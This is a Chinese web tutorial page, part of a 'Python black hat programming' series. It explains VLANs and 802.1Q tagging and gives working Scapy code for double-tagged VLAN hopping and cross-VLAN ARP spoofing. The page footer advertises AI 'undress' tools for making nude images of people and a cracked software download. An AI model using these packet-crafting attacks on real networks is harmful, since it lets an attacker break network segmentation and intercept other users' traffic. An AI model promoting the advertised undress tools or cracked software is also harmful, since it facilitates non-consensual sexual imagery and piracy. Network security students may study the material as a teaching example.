VLAN (Virtual Local Area Network) is a virtual network built based on Ethernet interaction technology. It can not only divide the same physical network into multiple VALNs, but also cross physical network barriers and divide users in different subnets into in the same VLAN. Figure 2 is an example of VLAN division.
Figure 2
There are many ways to implement VLAN. There are generally two types of VLAN division based on switching equipment:
l Switch-based port division
l Based on IEEE 802.1q protocol, extended Ethernet frame format
Layer 2-based VLAN Technology, there is the concept of Trunking, which is used to connect different switches to ensure that members of the same VLAN established across multiple switches can communicate with each other. The ports used for interconnection between switches are called Trunk ports. In addition to 80.2.1q, Cisco has its own Trunk protocol called ISL.
Figure 3
Figure 3 is an 802.1q data packet, which is not essentially different from an ordinary Ethernet frame. Just add a VLAN Tag. The VLAN Identifier in the red part identifies which VLAN a data packet belongs to, thus ensuring that the range of data broadcast does not span VLANs.
Now let’s think about it briefly. If we want to communicate across VLANs, can we just modify the identifier in the data packet?
3.4.1 VLAN Hopping
Based on the above analysis, we consider a simple scenario: cross-VLAN ping, Send a ping request from a host in Vlan1 to a host in Vlan2.
Before specific coding, we still need to solve the problem of VLAN packet construction. In Scapy, we use the Dot1Q class to construct the Tag part in Figure 3. As shown in Figure 4.
Figure 4
Now we can write a cross-VLAN ping request.
#!/usr/bin/python from scapy.all import * packet = Ether(dst="c0:d3:de:ad:be:ef") / \ Dot1Q(vlan=1) / \ Dot1Q(vlan=2) / \ IP(dst="192.168.13.3") / \ ICMP() sendp(packet)
In the above code we specify the MAC and IP address of the target host, and add two VLAN identifiers, the first one is for sending data The VLAN where the host is located, and the second one is the VLAN where the target host is located. The switch will remove the first identifier, and when it reads the second identifier, it will forward the packet to the target host.
3.4.2 Cross-VLAN ARP spoofing
3.1, 3.2 and 3.3 We are all discussing the issue of ARP spoofing. Since VLAN limits the broadcast domain, our previous code cannot perform ARP spoofing across VLANs. However, it is very simple to solve this problem. We only need to insert the VLAN identifier into the ARP spoofing data we constructed previously. The following code is the code we used to construct the ARP request packet in Section 3.1.
def build_req(): if options.target is None: pkt = Ether(src=mac, dst='ff:ff:ff:ff:ff:ff') / ARP(hwsrc=mac, psrc=args[0], pdst=args[0]) elif options.target: target_mac = getmacbyip(options.target) if target_mac is None: print "[-] Error: Could not resolve targets MAC address" sys.exit(1) pkt = Ether(src=mac, dst=target_mac) / ARP(hwsrc=mac, psrc=args[0], hwdst=target_mac, pdst=options.target) return pkt
In the part of constructing the data packet, we insert the VLAN identifier:
pkt = Ether(src=mac, dst=target_mac) /Dot1Q(vlan=our_vlan) / Dot1Q(vlan=target_vlan) / ARP(hwsrc=mac, psrc=args[0], hwdst=target_mac, pdst=options.target)
In this way, cross-VLAN ARP spoofing can be achieved.
3.4.3 Summary
This section mainly talks about how to construct data packets that spoof VLAN to achieve cross-VLAN Data communication and ARP spoofing purposes. It should be noted that the method in this article mainly targets the 802.1Q protocol and has no effect on VLANs that are physically isolated by ports.
The above is the detailed explanation of Python black hat programming 3.4 across VLANs introduced by the editor. I hope it will be helpful to you. If you have any questions, please leave me a message and the editor will reply in time. Ours. I would also like to thank you all for your support of the PHP Chinese website!
For more Python black hat programming 3.4 cross-VLAN related articles, please pay attention to the PHP Chinese website!
Is Tuple Comprehension possible in Python? If yes, how and if not why?Apr 28, 2025 pm 04:34 PMArticle discusses impossibility of tuple comprehension in Python due to syntax ambiguity. Alternatives like using tuple() with generator expressions are suggested for creating tuples efficiently.(159 characters)
What are Modules and Packages in Python?Apr 28, 2025 pm 04:33 PMThe article explains modules and packages in Python, their differences, and usage. Modules are single files, while packages are directories with an __init__.py file, organizing related modules hierarchically.
What is docstring in Python?Apr 28, 2025 pm 04:30 PMArticle discusses docstrings in Python, their usage, and benefits. Main issue: importance of docstrings for code documentation and accessibility.
What is a lambda function?Apr 28, 2025 pm 04:28 PMArticle discusses lambda functions, their differences from regular functions, and their utility in programming scenarios. Not all languages support them.
What is a break, continue and pass in Python?Apr 28, 2025 pm 04:26 PMArticle discusses break, continue, and pass in Python, explaining their roles in controlling loop execution and program flow.
What is a pass in Python?Apr 28, 2025 pm 04:25 PMThe article discusses the 'pass' statement in Python, a null operation used as a placeholder in code structures like functions and classes, allowing for future implementation without syntax errors.
Can we Pass a function as an argument in Python?Apr 28, 2025 pm 04:23 PMArticle discusses passing functions as arguments in Python, highlighting benefits like modularity and use cases such as sorting and decorators.
What is the difference between / and // in Python?Apr 28, 2025 pm 04:21 PMArticle discusses / and // operators in Python: / for true division, // for floor division. Main issue is understanding their differences and use cases.Character count: 158
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
Video Face Swap
Swap faces in any video effortlessly with our completely free AI face swap tool!
Hot Article
Hot Tools
MantisBT
Mantis is an easy-to-deploy web-based defect tracking tool designed to aid in product defect tracking. It requires PHP, MySQL and a web server. Check out our demo and hosting services.
EditPlus Chinese cracked version
Small size, syntax highlighting, does not support code prompt function
SublimeText3 Chinese version
Chinese version, very easy to use
ZendStudio 13.5.1 Mac
Powerful PHP integrated development environment
SecLists
SecLists is the ultimate security tester's companion. It is a collection of various types of lists that are frequently used during security assessments, all in one place. SecLists helps make security testing more efficient and productive by conveniently providing all the lists a security tester might need. List types include usernames, passwords, URLs, fuzzing payloads, sensitive data patterns, web shells, and more. The tester can simply pull this repository onto a new test machine and he will have access to every type of list he needs.
